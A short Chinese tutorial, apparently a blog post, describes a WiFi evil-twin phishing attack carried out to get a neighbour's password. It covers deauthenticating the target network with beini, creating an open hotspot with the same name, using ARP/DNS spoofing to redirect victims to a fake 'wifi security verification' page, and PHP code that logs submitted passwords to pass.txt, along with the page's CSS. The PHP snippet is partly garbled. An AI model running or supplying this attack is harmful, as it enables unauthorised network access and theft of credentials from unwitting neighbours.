前几天家里断网了,只好想办法蹭蹭隔壁的网,可是对方密码太强了,只好想了这招来钓取WIFI密码。
利用beini给对方的wifi(下面简称:awifi)断网,建立同名wifi(下面简称bwifi:),bwifi中使用arp dns欺骗使用户访问的网址自动跳转到我们事先布置好的页面(所谓的'wifi安全验证'),来钓取wifi密码。
示意图:
1.首先我们要搭建好web服务器(我这里使用的是win7_32+apache,直接使用了xampp快速搭建)
2.下面附上我自己写的钓鱼php,为了适应手机界面我引入了‘bootstrap.min.css’这个在网上可以下到
文件存放到htdocs文件夹下
index.php
<>
$pass = @$_POST['password'];
if(strlen($pass)>7){
$path='pass.txt';
$f=fopen($path,'a');
fwrite($f,$pass.'\r\n');
fclose($f);
}
?>
signin.css
body {
padding-top: 40px;
padding-bottom: 40px;
background-color: #eee;
}
.form-signin {
max-width: 330px;
padding: 15px;
margin: 0 auto;
}
.form-signin .form-signin-heading,
.form-signin .checkbox {
margin-bottom: 10px;
}
.form-signin .checkbox {
font-weight: normal;
}
.form-signin .form-control {
position: relative;
height: auto;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
padding: 10px;
font-size: 16px;
}
.form-signin .form-control:focus {
z-index: 2;
}
.form-signin input[type='email'] {
margin-bottom: -1px;
border-bottom-right-radius: 0;
border-bottom-left-radius: 0;
}
.form-signin input[type='password'] {
margin-bottom: 10px;
border-top-left-radius: 0;
border-top-right-radius: 0;
}
3.之后呢还需要新建一个pass.txt的文本文档用来接收钓到的密码
目录结构如下
4.在电脑上新建一个同名不加密wifi热点
5.arp dns欺骗跳转(这里就不详细说了网上有很多)
6.打开另一个电脑(beini系统)给对方的wifi进行断网攻击
下面就坐等收密码啦,密码获取到后会在pass.txt中?
本文及源码BY:mrzcpo,本文仅供学习,请勿非法。
联系客服